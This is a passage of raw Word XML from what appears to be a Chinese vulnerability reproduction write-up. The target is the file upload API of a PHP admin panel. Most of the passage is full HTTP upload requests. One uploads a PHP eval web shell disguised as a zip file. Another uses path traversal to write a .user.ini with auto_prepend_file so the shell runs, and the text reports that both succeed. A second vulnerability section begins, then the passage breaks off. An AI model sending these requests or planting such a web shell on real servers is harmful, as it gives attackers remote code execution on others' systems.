                    <w:p w14:paraId="18F3CB0A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5BC0FC26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..\./1.zip</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="15961C84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3AD0BE35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Content-Disposition: form-data; name="safe"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="751DD151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13F3F701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0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1157AE78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6BCCE18C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Content-Disposition: form-data; name="uptype"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2DF59B4A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42534138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local</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0EF9EB4C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24C46FF1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Content-Disposition: form-data; name="file"; filename="1.zip"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1F074645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Content-Type: image/png</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="751F971C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57F50967" w14:textId="77777777" w:rsidR="002B19D2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&lt;?php @eval($_POST[1]);?&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="017FD32E" w14:textId="6E769466" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="002B19D2" w:rsidP="002B19D2">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exac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7B5FFF">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>------WebKitFormBoundary3VyVEPpvQynFo76H--</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00861864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>先上传一个</w:t>
      </w:r>
      <w:r w:rsidR="005C5BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任意文件内容为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0066132A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="005C5BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C5BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的木</w:t>
      </w:r>
      <w:r w:rsidR="00861864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>马</w:t>
      </w:r>
      <w:r w:rsidR="00861864">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE233D" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689CE79F" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2003C1" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501B2F29" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6098DD" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5950A8" w14:textId="77777777" w:rsidR="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8D979A" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="00861864" w:rsidRDefault="00861864" w:rsidP="00861864">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EFED60" w14:textId="3B117305" w:rsidR="00861864" w:rsidRPr="003F16E8" w:rsidRDefault="0037462D" w:rsidP="003F16E8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037462D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
          <w:noProof/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2897F1DE" wp14:editId="3787AD8A">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1032061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61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5713" w14:textId="4F1CE7A8" w:rsidR="00032360" w:rsidRDefault="008125A6" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4FB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造payload上传</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4FB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="004F4FB0" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidR="004F4FB0" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo" w:hint="eastAsia"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>localhost</w:t>
        </w:r>
        <w:r w:rsidR="004F4FB0" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Menlo"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>/admin/api.upload/file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05336B12" w14:textId="7D503F35" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:noProof/>
          <w:color w:val="5A5A5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BD88" wp14:editId="6CFF4C66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5219700" cy="3192780"/>
                <wp:effectExtent l="0" t="0" r="12700" b="7620"/>
                <wp:wrapNone/>
                <wp:docPr id="8460150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9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9B8F1" w14:textId="77777777" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360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</w:pPr>
                            <w:r w:rsidRPr="002D725C"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  <w:t>POST /admin/api.upload/file HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FA6F08B" w14:textId="77777777" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360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</w:pPr>
                            <w:r w:rsidRPr="002D725C"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  <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2266E29C" w14:textId="2267EC2F" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360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</w:pPr>
                            <w:r w:rsidRPr="002D725C"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  <w:t xml:space="preserve">Cookie: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D725C">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>用户</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D725C">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>cookie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6010338A" w14:textId="3B001B43" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360">
                            <w:pPr>
                              <w:spacing w:line="180" w:lineRule="exact"/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</w:pPr>
                            <w:r w:rsidRPr="002D725C"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  <w:t xml:space="preserve">Host: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D725C">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>IP</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D725C">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>：</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D725C">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>PORT</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60BEE0FE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2D725C"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</w:rPr>
                              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00032360"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Pr="00032360">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
                                <w:color w:val="303942"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                              <w:br/>
                            </w:r>
                            <w:r w:rsidRPr="00032360">
                              <w:rPr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15CA6251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Content-Disposition: form-data; name="key"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="102A8270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9DAC154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..\./.user.ini</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="683787A8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2DCC48A2" w14:textId="777BDDC5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Content-Disposition: form-data; name="safe"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6C6E4836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10B46F8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  <w:p w14:paraId="78AE62F2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5516C95C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Content-Disposition: form-data; name="uptype"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6637BA64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2F684B8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local</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="464E3A05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------WebKitFormBoundary3VyVEPpvQynFo76H</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4214ADFB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Content-Disposition: form-data; name="file"; filename="1.ini"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E6350B3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Content-Type: image/png</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="331BA6B0" w14:textId="7777777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D6889A" w14:textId="404C9327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auto_prepend_file=1</w:t>
                            </w:r>
                            <w:r w:rsidR="00861864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2B19D2">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>zip</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F760B11" w14:textId="2F434D8B" w:rsidR="00032360" w:rsidRPr="00032360" w:rsidRDefault="00032360" w:rsidP="00032360">
                            <w:pPr>
                              <w:spacing w:line="18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032360">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>------WebKitFormBoundary3VyVEPpvQynFo76H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BD88" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18pt;margin-top:1.2pt;width:411pt;height:25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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7A99B8F1" w14:textId="77777777" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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</w:pPr>
                      <w:r w:rsidRPr="002D725C"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  <w:t>POST /admin/api.upload/file HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FA6F08B" w14:textId="77777777" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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</w:pPr>
                      <w:r w:rsidRPr="002D725C"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  <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2266E29C" w14:textId="2267EC2F" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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</w:pPr>
                      <w:r w:rsidRPr="002D725C"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  <w:t xml:space="preserve">Cookie: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D725C">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>用户</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D725C">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>cookie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6010338A" w14:textId="3B001B43" w:rsidR="00032360" w:rsidRPr="002D725C" w:rsidRDefault="00032360" w:rsidP="00032360">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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</w:pPr>
                      <w:r w:rsidRPr="002D725C"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  <w:t xml:space="preserve">Host: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D725C">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>IP</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D725C">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>：</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D725C">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>PORT</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="60BEE0FE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2D725C"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</w:rPr>
                        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00032360"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Pr="00032360">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
                          <w:color w:val="303942"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r w:rsidRPr="00032360">
                        <w:rPr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15CA6251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Content-Disposition: form-data; name="key"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="102A8270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</w:p>
                    <w:p w14:paraId="49DAC154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..\./.user.ini</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="683787A8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2DCC48A2" w14:textId="777BDDC5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Content-Disposition: form-data; name="safe"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6C6E4836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</w:p>
                    <w:p w14:paraId="110B46F8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0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78AE62F2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5516C95C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Content-Disposition: form-data; name="uptype"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6637BA64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</w:p>
                    <w:p w14:paraId="02F684B8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local</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="464E3A05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------WebKitFormBoundary3VyVEPpvQynFo76H</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4214ADFB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Content-Disposition: form-data; name="file"; filename="1.ini"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E6350B3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Content-Type: image/png</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="331BA6B0" w14:textId="7777777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</w:p>
                    <w:p w14:paraId="46D6889A" w14:textId="404C9327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auto_prepend_file=1</w:t>
                      </w:r>
                      <w:r w:rsidR="00861864">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="002B19D2">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>zip</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F760B11" w14:textId="2F434D8B" w:rsidR="00032360" w:rsidRPr="00032360" w:rsidRDefault="00032360" w:rsidP="00032360">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/>
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00032360">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>------WebKitFormBoundary3VyVEPpvQynFo76H--</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB54C2" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="357E903D" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="12FAAF61" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="09CA935B" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="46F9EEBA" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="566C3403" w14:textId="77777777" w:rsidR="00032360" w:rsidRDefault="00032360" w:rsidP="008125A6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/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</w:p>
    <w:p w14:paraId="62C3BA81" w14:textId="77777777" w:rsidR="00032360" w:rsidRPr="00861864" w:rsidRDefault="00032360" w:rsidP="00861864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5870AF73" w14:textId="25F31DF1" w:rsidR="004F3039" w:rsidRDefault="008125A6" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75FD4">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008125A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C75EA1" wp14:editId="52A68BCD">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="15495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F17" w14:textId="29B90A43" w:rsidR="00E75FD4" w:rsidRDefault="00D75DA9" w:rsidP="00D75DA9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 w:rsidRPr="00D75DA9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACB6570" wp14:editId="5FA9B800">
            <wp:extent cx="5274310" cy="2115820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="682561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611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EC73" w14:textId="15C1FA88" w:rsidR="00861864" w:rsidRDefault="00874640" w:rsidP="00D75DA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都上传成功了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9D126" w14:textId="2E905013" w:rsidR="00941EC1" w:rsidRDefault="00941EC1" w:rsidP="00D75DA9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941EC1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715CC433" wp14:editId="3E8D5A75">
            <wp:extent cx="5274310" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="2079290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0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EBC4" w14:textId="4FD407C1" w:rsidR="00401476" w:rsidRDefault="00401476" w:rsidP="00D75DA9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BA4AD0" w14:textId="4B0AC3C4" w:rsidR="0009260F" w:rsidRDefault="0009260F" w:rsidP="00D75DA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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>也成功解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8C85A" w14:textId="77777777" w:rsidR="0058204A" w:rsidRDefault="0058204A" w:rsidP="00D75DA9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8C147A" w14:textId="5679B2FB" w:rsidR="0058204A" w:rsidRDefault="0058204A" w:rsidP="0058204A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058204A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞二复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09061232" w14:textId="237B7FE5" w:rsidR="0058204A" w:rsidRDefault="0058204A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登录后台设置系统参数</w:t>
      </w:r>
      <w:r w:rsidR="006736AA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006736AA" w:rsidRPr="006736AA">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E31B249" wp14:editId="62D5FDBA">
            <wp:extent cx="5274310" cy="2686685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1531960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608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D197" w14:textId="77777777" w:rsidR="00FE1603" w:rsidRDefault="006736AA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此处填写纯静态的可下载的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
